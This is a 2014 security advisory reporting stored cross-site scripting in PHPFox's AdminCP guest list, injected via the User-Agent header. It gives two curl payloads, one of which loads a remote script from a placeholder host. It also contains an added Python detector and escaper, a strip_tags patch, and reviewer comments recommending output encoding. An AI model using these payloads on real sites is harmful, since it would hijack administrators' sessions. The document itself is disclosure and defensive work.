PHPFox Cross Site Scripting

2014-11-18T00:00:00
ID PACKETSTORM:129153
Type packetstorm
Reporter Wesley Henrique Leite
Modified 2014-11-18T00:00:00

Description

                                        
CNA primary  
MITRE Corporation ( cve-assign [NOSPAM] mitre [NOSPAM] org )  
  
Software Vendors  
http://moxi9.com/phpfox  
Product: PhpFox  
Version: ALL  
  
Research  
Wesley Henrique Leite ( wesleyhenrique [NOSPAM] gmail [NOSPAM] com )  
  
  
[+] INFORMATION  
Vendor Notified : 2014-10-22  
Vendor Homepage : http://moxi9.com/phpfox  
  
Response Vendor: fixed 2014-10-23 (to v4 Beta)  
  
[+] DESCRIPTION  
  
The system stores every URL accessed in a database table; the structure of that  
table, 'phpfox_log_session', is shown below.  
  
[phpfox]> desc phpfox_log_session;  
+---------------+----------------------+------+-----+---------+-------+  
| Field         | Type                 | Null | Key | Default | Extra |  
+---------------+----------------------+------+-----+---------+-------+  
| session_hash  | char(32)             | NO   | MUL | NULL    |       |  
| id_hash       | char(32)             | NO   |     | NULL    |       |  
| captcha_hash  | char(32)             | YES  | MUL | NULL    |       |  
| user_id       | int(10) unsigned     | NO   | MUL | NULL    |       |  
| last_activity | int(10) unsigned     | NO   | MUL | NULL    |       |  
| location      | varchar(255)         | YES  |     | NULL    |       |  
| is_forum      | tinyint(1)           | NO   |     | NULL    |       |  
| forum_id      | smallint(4) unsigned | NO   |     | NULL    |       |  
| im_status     | tinyint(1)           | NO   |     | 0       |       |  
| im_hide       | tinyint(1)           | NO   |     | 0       |       |  
| ip_address    | varchar(15)          | NO   |     | NULL    |       |  
| user_agent    | varchar(100)         | NO   |     | NULL    |       |  
+---------------+----------------------+------+-----+---------+-------+  
  
The column that a client can manipulate directly is:  
-> user_agent (varchar(100))  
  
All accesses stored by the system, including bots and users browsing the  
web site, can be seen in:  
  
AdminCP  
TOOLS > Online > Guests/Bots  
  
Output  
| IP ADDRESS | User-Agent | ...   
  
Knowing this, the following commands were used to inject a script into the  
AdminCP through the User-Agent header.  
  
$ curl -A "<script src='http://www.example.com/script.js'></script>" \  
http://www.meusite.com.br/  
  
OR  
  
$ curl -A "<script>alert(1);</script>" http://www.meusite.com.br/  
  
When any user with administrative access opens  
'AdminCP'  
TOOLS > Online > Guests/Bots  
  
the script runs in the administrative area.  
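As an added example (not part of the advisory or of PHPFox), the following Python approaches the same issue from the defender's side: it parses combined-format web server access logs, flags User-Agent values that carry HTML markup (the condition that ends up in phpfox_log_session.user_agent), and shows the output-encoded cell a template should render instead of the raw value. The log lines are constructed, and the markup heuristic is an assumption of this example.

```python
import html
import re

# Constructed sample access-log lines in Apache/nginx "combined" format.
# The third line carries the kind of User-Agent the advisory describes; the
# others are ordinary browser and crawler strings.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Nov/2014:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/33.0"
203.0.113.9 - - [18/Nov/2014:10:01:07 +0000] "GET /robots.txt HTTP/1.1" 200 61 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
198.51.100.7 - - [18/Nov/2014:10:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "<script>alert(1);</script>"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Heuristic (an assumption of this example): markup that has no business in a
# User-Agent header, i.e. a tag opener, an HTML event-handler attribute, or a
# javascript: reference.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-zA-Z]|\bon[a-z]+\s*=|javascript:', re.IGNORECASE)


def parse_combined(line):
    """Return the named fields of one combined-format log line, or None."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def suspicious_user_agents(log_text):
    """Return (ip, user_agent) pairs for requests whose User-Agent carries markup."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec and MARKUP_RE.search(rec["ua"]):
            hits.append((rec["ip"], rec["ua"]))
    return hits


def render_cell(user_agent, max_len=100):
    """Escape a stored user_agent for safe placement in an HTML <td>.

    Mirrors the 100-character limit of the user_agent column and uses output
    encoding (the equivalent of PHP's htmlspecialchars with ENT_QUOTES) rather
    than tag stripping, so the stored value is shown verbatim but inert.
    """
    return "<td>%s</td>" % html.escape(user_agent[:max_len], quote=True)
```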
  
  
[+] My Solution  
  
(see line 1.8 of the patch below)  
  
1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 10:00:11 2014 -0200  
1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php Tue Oct 21 12:28:39 2014 -0200  
1.3 @@ -25,7 +25,7 @@  
1.4 {foreach from=$aGuests key=iKey item=aGuest}  
1.5 <tr class="checkRow{if is_int($iKey/2)} tr{else}{/if}">  
1.6 <td><a href="{url link='admincp.core.ip' search=$aGuest.ip_address_search}" title="{phrase var='admincp.view_all_the_activity_from_this_ip'}">{$aGuest.ip_address}</a></td>  
1.7 - <td>{$aGuest.user_agent}</td>  
1.8 + <td>{$aGuest.user_agent|strip_tags}</td>  
1.9 <td class="t_center">  
1.10 <div class="js_item_is_active"{if !$aGuest.ban_id} style="display:none;"{/if}>  
1.11 <a href="#?call=ban.ip&ip={$aGuest.ip_address}&active=0" class="js_item_active_link" title="{phrase var='admincp.unban'}">{img theme='misc/bullet_green.png' alt=''}</a>  
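Review bot: `strip_tags` on line 1.8 is a filter, not an encoding: it silently discards the angle-bracketed part of the stored value, so the administrator no longer sees what the client actually sent, and it leaves quotes and ampersands untouched, which would matter if the same value were ever placed in an attribute. HTML-escaping at output (a template escape modifier equivalent to htmlspecialchars with ENT_QUOTES) is the safer and lossless choice, and the same treatment should be applied to the other per-guest fields rendered in this row, such as `{$aGuest.ip_address}` on lines 1.6 and 1.11, rather than only to the column the advisory demonstrates.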
1.12 @@ -43,4 +43,4 @@  
1.13 <div class="extra_info">  
1.14 {phrase var='admincp.no_guests_online'}  
1.15 </div>  
1.16 -{/if}  
1.17 \ No newline at end of file  
1.18 +{/if}  
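Review bot: this hunk is whitespace-only, adding the missing newline at end of file after `{/if}` with no behavioural change; either drop it from the security fix or mention it in the description so reviewers do not search it for a functional change.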
  